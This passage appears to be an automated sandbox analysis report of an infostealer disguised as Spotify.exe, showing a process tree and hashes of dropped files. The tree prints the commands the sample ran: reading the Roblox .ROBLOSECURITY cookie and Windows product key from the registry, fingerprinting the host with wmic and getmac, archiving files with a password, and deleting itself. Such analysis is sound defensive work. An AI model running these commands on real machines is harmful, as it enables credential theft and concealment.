                                                                        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                        5⤵
                                                                        • Command and Scripting Interpreter: PowerShell
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:536
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                      4⤵
                                                                        PID:2844
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                          5⤵
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          PID:3732
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "getmac"
                                                                        4⤵
                                                                          PID:2440
                                                                          • C:\Windows\system32\getmac.exe
                                                                            getmac
                                                                            5⤵
                                                                              PID:2688
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI11002\rar.exe a -r -hp"wake" "C:\Users\Admin\AppData\Local\Temp\7LTes.zip" *"
                                                                            4⤵
                                                                              PID:4680
                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI11002\rar.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\_MEI11002\rar.exe a -r -hp"wake" "C:\Users\Admin\AppData\Local\Temp\7LTes.zip" *
                                                                                5⤵
                                                                                • Executes dropped EXE
                                                                                PID:3812
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                              4⤵
                                                                                PID:4612
                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                  wmic os get Caption
                                                                                  5⤵
                                                                                    PID:3464
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                  4⤵
                                                                                    PID:5116
                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                      wmic computersystem get totalphysicalmemory
                                                                                      5⤵
                                                                                        PID:4912
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                      4⤵
                                                                                        PID:2512
                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                          wmic csproduct get uuid
                                                                                          5⤵
                                                                                            PID:2668
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                          4⤵
                                                                                            PID:3448
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                              5⤵
                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              PID:4588
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                            4⤵
                                                                                              PID:3616
                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                wmic path win32_VideoController get name
                                                                                                5⤵
                                                                                                • Detects videocard installed
                                                                                                PID:2204
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                              4⤵
                                                                                                PID:4668
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                  5⤵
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  PID:2844
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\7zO839287C7\Spotify.exe""
                                                                                                4⤵
                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                PID:2372
                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                  ping localhost -n 3
                                                                                                  5⤵
                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                  • Runs ping.exe
                                                                                                  PID:2972
                                                                                        • C:\Windows\system32\backgroundTaskHost.exe
                                                                                          "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                                                                                          1⤵
                                                                                            PID:652
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                            1⤵
                                                                                            • Enumerates system info in registry
                                                                                            • Modifies data under HKEY_USERS
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                            • Suspicious use of SendNotifyMessage
                                                                                            PID:4472
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffe2099cc40,0x7ffe2099cc4c,0x7ffe2099cc58
                                                                                              2⤵
                                                                                                PID:4516
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1940,i,1839282609543597180,12677278614986139260,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1936 /prefetch:2
                                                                                                2⤵
                                                                                                  PID:2388
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2108,i,1839282609543597180,12677278614986139260,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2160 /prefetch:3
                                                                                                  2⤵
                                                                                                    PID:4080
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2320,i,1839282609543597180,12677278614986139260,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2328 /prefetch:8
                                                                                                    2⤵
                                                                                                      PID:2752
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3164,i,1839282609543597180,12677278614986139260,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3184 /prefetch:1
                                                                                                      2⤵
                                                                                                        PID:3448
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3252,i,1839282609543597180,12677278614986139260,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3232 /prefetch:1
                                                                                                        2⤵
                                                                                                          PID:4040
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4440,i,1839282609543597180,12677278614986139260,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4584 /prefetch:1
                                                                                                          2⤵
                                                                                                            PID:2844
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4864,i,1839282609543597180,12677278614986139260,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4872 /prefetch:8
                                                                                                            2⤵
                                                                                                              PID:3444
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4808,i,1839282609543597180,12677278614986139260,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4796 /prefetch:8
                                                                                                              2⤵
                                                                                                                PID:2172
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5216,i,1839282609543597180,12677278614986139260,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5176 /prefetch:8
                                                                                                                2⤵
                                                                                                                  PID:2960
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5224,i,1839282609543597180,12677278614986139260,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5164 /prefetch:8
                                                                                                                  2⤵
                                                                                                                    PID:2112
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5348,i,1839282609543597180,12677278614986139260,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5176 /prefetch:8
                                                                                                                    2⤵
                                                                                                                      PID:2832
                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5204,i,1839282609543597180,12677278614986139260,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5332 /prefetch:8
                                                                                                                      2⤵
                                                                                                                        PID:216
                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5644,i,1839282609543597180,12677278614986139260,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5552 /prefetch:2
                                                                                                                        2⤵
                                                                                                                          PID:2956
                                                                                                                      • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                                                        "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                                                        1⤵
                                                                                                                          PID:1740
                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                                                                                          1⤵
                                                                                                                            PID:4036

                                                                                                                          Network

                                                                                                                          MITRE ATT&CK Enterprise v15

                                                                                                                          Replay Monitor

                                                                                                                          Loading Replay Monitor...

                                                                                                                          Downloads

                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

                                                                                                                            Filesize

                                                                                                                            649B

                                                                                                                            MD5

                                                                                                                            b64fe7f4e3a8a4464a1948ce5914d8f3

                                                                                                                            SHA1

                                                                                                                            678fa78af8458bb2fc363aecd4ab55c0a8738963

                                                                                                                            SHA256

                                                                                                                            bfcf69dae6b0428db0f8fd4b5cd44aab9e3ad3458b9de290028a6bec17c6fae3

                                                                                                                            SHA512

                                                                                                                            5ace91163f4609bdc4b00aa1669be34873709096f0d7314e6ae3e504f50c15212cfde3a4dd0793efd52fcdd499b8dee9ec453344cf99d9ad7c2f42c50f01c55b

                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.85.1_0\_locales\en\messages.json

                                                                                                                            Filesize

                                                                                                                            851B

                                                                                                                            MD5

                                                                                                                            07ffbe5f24ca348723ff8c6c488abfb8

                                                                                                                            SHA1

                                                                                                                            6dc2851e39b2ee38f88cf5c35a90171dbea5b690

                                                                                                                            SHA256

                                                                                                                            6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

                                                                                                                            SHA512

                                                                                                                            7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.85.1_0\dasherSettingSchema.json

                                                                                                                            Filesize

                                                                                                                            854B

                                                                                                                            MD5

                                                                                                                            4ec1df2da46182103d2ffc3b92d20ca5

                                                                                                                            SHA1

                                                                                                                            fb9d1ba3710cf31a87165317c6edc110e98994ce

                                                                                                                            SHA256

                                                                                                                            6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

                                                                                                                            SHA512

                                                                                                                            939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                                            Filesize

                                                                                                                            2B

                                                                                                                            MD5

                                                                                                                            d751713988987e9331980363e24189ce

                                                                                                                            SHA1

                                                                                                                            97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                            SHA256

                                                                                                                            4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                            SHA512

                                                                                                                            b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

                                                                                                                            Filesize

                                                                                                                            356B

                                                                                                                            MD5

                                                                                                                            ecf7acb8cd4960041fba811c22d4f960

                                                                                                                            SHA1

                                                                                                                            55f95c893284f90832da11a06caf49e9fb30d7eb

                                                                                                                            SHA256

                                                                                                                            36687b90a204484db44d05fe856a133a7883254bc54d49b2537254a595157523

                                                                                                                            SHA512

                                                                                                                            363755c53397a0ba5fe5a5a2e7cfce4b752b6ed17d4c6a510f1132d4a891f011f47382c2c8c80ad3daadd868f8e7db9a3735c4fa2c10640905221b18af96db42

                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                            Filesize

                                                                                                                            9KB

                                                                                                                            MD5

                                                                                                                            90dd53cbfe2ea89afeddc7b5a76d1a49

                                                                                                                            SHA1

                                                                                                                            fdb80e70f5890b9270990f71d7457d49b5fd64cd

                                                                                                                            SHA256

                                                                                                                            b88b05da53106049e2b0d278e48689ae24d5e7151ad44de60c74233a7587f495

                                                                                                                            SHA512

                                                                                                                            ac8aeeb9b8866fd4a1569cf6f2b8684595873e2e479978cd24cb3bdec4e16444f7a0d3e2268178ff4b948f7d8a6d489ce93c08ffc63e27f380fd8ddffc2f70a8

                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                                            Filesize

                                                                                                                            15KB

                                                                                                                            MD5

                                                                                                                            e51672b81b4bce9f795055c5591a1ff2

                                                                                                                            SHA1

                                                                                                                            f413df6f2e50df0a2c1af0418e7aba5dd99b9b6c

                                                                                                                            SHA256

                                                                                                                            9e9585b31656df5497c3124a06bfcc49f5f5b2382507ec999bd5aee1608ee305

                                                                                                                            SHA512

                                                                                                                            9a7b77ace7085cf49d7fb76b970a59f54577e9a05cc16e3aa6189dfbfc024d69144b7ff41b5e10a993eb5a901e31fe9a521ffb25f8031bd3d854077acc910197

                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                            Filesize

                                                                                                                            231KB

                                                                                                                            MD5

                                                                                                                            3ade2e8f5f939be7a42c842f6ae6c29c

                                                                                                                            SHA1

                                                                                                                            35bf2f0985570fcfceaa4853e4d8bf87e69724fc

                                                                                                                            SHA256

                                                                                                                            a07e4079163d393e25341f4488265173932683ccc6c5f78803346872e06d16a9

                                                                                                                            SHA512

                                                                                                                            a5180d5d1032ee803d4a25aafb56ec52d636f601ba34e160329d11335d391712cb836a18d7203fd6bf9fcf7b88c7c10ae2a692ebb9a78da3c882f63dcfe5f9e3

                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                            Filesize

                                                                                                                            116KB

                                                                                                                            MD5

                                                                                                                            acbc954635d2c0353cc7cd6a2ee737c7

                                                                                                                            SHA1

                                                                                                                            06d29c81dc0d3dec990cc791182aeeaf6a805971

                                                                                                                            SHA256

                                                                                                                            0c44038f8edbf8bb02192f09fb7945d4cb50ba3ee1ffd8941669173c1090ac3f

                                                                                                                            SHA512

                                                                                                                            7178b462c2ad24a95b589019ec67108df5212b5e8fe5e18c63d8d9391e60583b3411d86ddb802ca21e6bf58df89fe68578357446ee546e02af811b0f50d26bb6

                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                            Filesize

                                                                                                                            2KB

                                                                                                                            MD5

                                                                                                                            d85ba6ff808d9e5444a4b369f5bc2730

                                                                                                                            SHA1

                                                                                                                            31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                                                            SHA256

                                                                                                                            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                                                            SHA512

                                                                                                                            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                            Filesize

                                                                                                                            944B

                                                                                                                            MD5

                                                                                                                            77d622bb1a5b250869a3238b9bc1402b

                                                                                                                            SHA1

                                                                                                                            d47f4003c2554b9dfc4c16f22460b331886b191b

                                                                                                                            SHA256

                                                                                                                            f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

                                                                                                                            SHA512

                                                                                                                            d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                            Filesize

                                                                                                                            944B

                                                                                                                            MD5

                                                                                                                            9006afb2f47b3bb7d3669c647651e29c

                                                                                                                            SHA1

                                                                                                                            cdc0d7654be8e516df2c36accd9b52eac1f00ffd

                                                                                                                            SHA256

                                                                                                                            a025443b35555d64473b1ef01194239e808c49b47c924b99b942514036901302

                                                                                                                            SHA512

                                                                                                                            f2e72bbecfa823415bd0be7a091b1272e10e11059a71baf115780aa7ce3e694d114f6642de161ccba24e2182765b8188cc6dbb804fd07e318af9e1917549841c

                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                            Filesize

                                                                                                                            1KB

                                                                                                                            MD5

                                                                                                                            ae400162c5ca394a330ec2798e53c3f1

                                                                                                                            SHA1

                                                                                                                            af3a93d87a7a792a99ac0075cd17a9802eb5b4b6

                                                                                                                            SHA256

                                                                                                                            f3e9d7997043d83fd9a254bd0a70720db11528a2c7c247e40b2a428dc3c86660

                                                                                                                            SHA512

                                                                                                                            7a5acede52d6dff8bf451f9706f4e87501a47db9810fa0e94e37b947a03e0b770c14295cfe3428430ef2a18b81fdd9ca81265ba5ed7695dc7bd378e5dd12814c

                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                            Filesize

                                                                                                                            1KB

                                                                                                                            MD5

                                                                                                                            276798eeb29a49dc6e199768bc9c2e71

                                                                                                                            SHA1

                                                                                                                            5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

                                                                                                                            SHA256

                                                                                                                            cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

                                                                                                                            SHA512

                                                                                                                            0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zO839287C7\Spotify.exe

                                                                                                                            Filesize

                                                                                                                            7.0MB

                                                                                                                            MD5

                                                                                                                            0e5f390e7694600ffe6cebd8cc8acd37

                                                                                                                            SHA1

                                                                                                                            31d923931ca0697a054c9c8e025c81780cba0146

                                                                                                                            SHA256

                                                                                                                            7ca23f18cfd17c4b5b99e95accbb5c493d0b05511872b2b234d9a2b64a8d2597

                                                                                                                            SHA512

                                                                                                                            a463510eb524a1e26851f26693b474b3295721b7f476807d1feb000c7ca20f17aa3cc16668c74524e427bf72e0ec067133b7ce23d6249e22e2f2099c97c900bf

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RESF618.tmp

                                                                                                                            Filesize

                                                                                                                            1KB

                                                                                                                            MD5

                                                                                                                            5e4197408903969d8ac395d6e2f7899c

                                                                                                                            SHA1

                                                                                                                            a4c68a5171235b8077c7dff7d2db1390e6d331fd

                                                                                                                            SHA256

                                                                                                                            384a3a6056df25b7eae2753688cb7715e5103d098d56c6569e5892a04588e0a1

                                                                                                                            SHA512

                                                                                                                            a2785910ff58964d3a7fe36ac993eec8c4f04eaa67eab736731fc1f9dc71fa153332936bc6fc14bfaba0d23a38d2d2b81b84ccc149d1b01f0d25c31593fdbff8

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI11002\VCRUNTIME140.dll

                                                                                                                            Filesize

                                                                                                                            96KB

                                                                                                                            MD5

                                                                                                                            f12681a472b9dd04a812e16096514974

                                                                                                                            SHA1

                                                                                                                            6fd102eb3e0b0e6eef08118d71f28702d1a9067c

                                                                                                                            SHA256

                                                                                                                            d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8

                                                                                                                            SHA512

                                                                                                                            7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI11002\_bz2.pyd

                                                                                                                            Filesize

                                                                                                                            46KB

                                                                                                                            MD5

                                                                                                                            0c13627f114f346604b0e8cbc03baf29

                                                                                                                            SHA1

                                                                                                                            bf77611d924df2c80aabcc3f70520d78408587a2

                                                                                                                            SHA256

                                                                                                                            df1e666b55aae6ede59ef672d173bd0d64ef3e824a64918e081082b8626a5861

                                                                                                                            SHA512

                                                                                                                            c97fa0f0988581eae5194bd6111c1d9c0e5b1411bab47df5aa7c39aad69bfbeca383514d6aaa45439bb46eacf6552d7b7ed08876b5e6864c8507eaa0a72d4334

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI11002\_ctypes.pyd

                                                                                                                            Filesize

                                                                                                                            57KB

                                                                                                                            MD5

                                                                                                                            38fb83bd4febed211bd25e19e1cae555

                                                                                                                            SHA1

                                                                                                                            4541df6b69d0d52687edb12a878ae2cd44f82db6

                                                                                                                            SHA256

                                                                                                                            cd31af70cbcfe81b01a75ebeb2de86079f4cbe767b75c3b5799ef8b9f0392d65

                                                                                                                            SHA512

                                                                                                                            f703b231b675c45accb1f05cd34319b5b3b7583d85bf2d54194f9e7c704fbcd82ef2a2cd286e6a50234f02c43616fbeccfd635aefd73424c1834f5dca52c0931

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI11002\_decimal.pyd

                                                                                                                            Filesize

                                                                                                                            104KB

                                                                                                                            MD5

                                                                                                                            7ba541defe3739a888be466c999c9787

                                                                                                                            SHA1

                                                                                                                            ad0a4df9523eeeafc1e67b0e4e3d7a6cf9c4dfac

                                                                                                                            SHA256

                                                                                                                            f90efa10d90d940cde48aafe02c13a0fc0a1f0be7f3714856b7a1435f5decf29

                                                                                                                            SHA512

                                                                                                                            9194a527a17a505d049161935432fa25ba154e1aee6306dee9054071f249c891f0ca7839de3a21d09b57fdc3f29ee7c4f08237b0dfffafa8f0078cfe464bed3b

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI11002\_hashlib.pyd

                                                                                                                            Filesize

                                                                                                                            33KB

                                                                                                                            MD5

                                                                                                                            596df8ada4b8bc4ae2c2e5bbb41a6c2e

                                                                                                                            SHA1

                                                                                                                            e814c2e2e874961a18d420c49d34b03c2b87d068

                                                                                                                            SHA256

                                                                                                                            54348cfbf95fd818d74014c16343d9134282d2cf238329eec2cda1e2591565ec

                                                                                                                            SHA512

                                                                                                                            e16aad5230e4af7437b19c3db373b1a0a0a84576b608b34430cced04ffc652c6fb5d8a1fe1d49ac623d8ae94c8735800c6b0a12c531dcdd012b05b5fd61dff2e

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI11002\_lzma.pyd

                                                                                                                            Filesize

                                                                                                                            84KB

                                                                                                                            MD5

                                                                                                                            8d9e1bb65a192c8446155a723c23d4c5

                                                                                                                            SHA1

                                                                                                                            ea02b1bf175b7ef89ba092720b3daa0c11bef0f0

                                                                                                                            SHA256

                                                                                                                            1549fe64b710818950aa9bf45d43fe278ce59f3b87b3497d2106ff793efa6cf7

                                                                                                                            SHA512

                                                                                                                            4d67306fe8334f772fe9d463cb4f874a8b56d1a4ad3825cff53cae4e22fa3e1adba982f4ea24785312b73d84a52d224dfb4577c1132613aa3ae050a990e4abdf

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI11002\_queue.pyd

                                                                                                                            Filesize

                                                                                                                            24KB

                                                                                                                            MD5

                                                                                                                            fbbbfbcdcf0a7c1611e27f4b3b71079e

                                                                                                                            SHA1

                                                                                                                            56888df9701f9faa86c03168adcd269192887b7b

                                                                                                                            SHA256

                                                                                                                            699c1f0f0387511ef543c0df7ef81a13a1cffde4ce4cd43a1baf47a893b99163

                                                                                                                            SHA512

                                                                                                                            0a5ba701653ce9755048ae7b0395a15fbb35509bef7c4b4fe7f11dc4934f3bd298bcddbf2a05b61f75f8eb44c4c41b3616f07f9944e0620b031cbe87a7443284

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI11002\_socket.pyd

                                                                                                                            Filesize

                                                                                                                            41KB

                                                                                                                            MD5

                                                                                                                            4351d7086e5221398b5b78906f4e84ac

                                                                                                                            SHA1

                                                                                                                            ba515a14ec1b076a6a3eab900df57f4f37be104d

                                                                                                                            SHA256

                                                                                                                            a0fa25eef91825797f01754b7d7cf5106e355cf21322e926632f90af01280abe

                                                                                                                            SHA512

                                                                                                                            a1bcf51e797ccae58a0b4cfe83546e5e11f8fc011ca3568578c42e20bd7a367a5e1fa4237fb57aa84936eec635337e457a61a2a4d6eca3e90e6dde18ae808025

                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\_MEI11002\_sqlite3.pyd

                                                                                                                            Filesize

                                                                                                                            54KB

                                                                                                                            MD5

                                                                                                                            d678600c8af1eeeaa5d8c1d668190608

                                                                                                                            SHA1

                                                                                                                            080404040afc8b6e5206729dd2b9ee7cf2cb70bc

                                                                                                                            SHA256

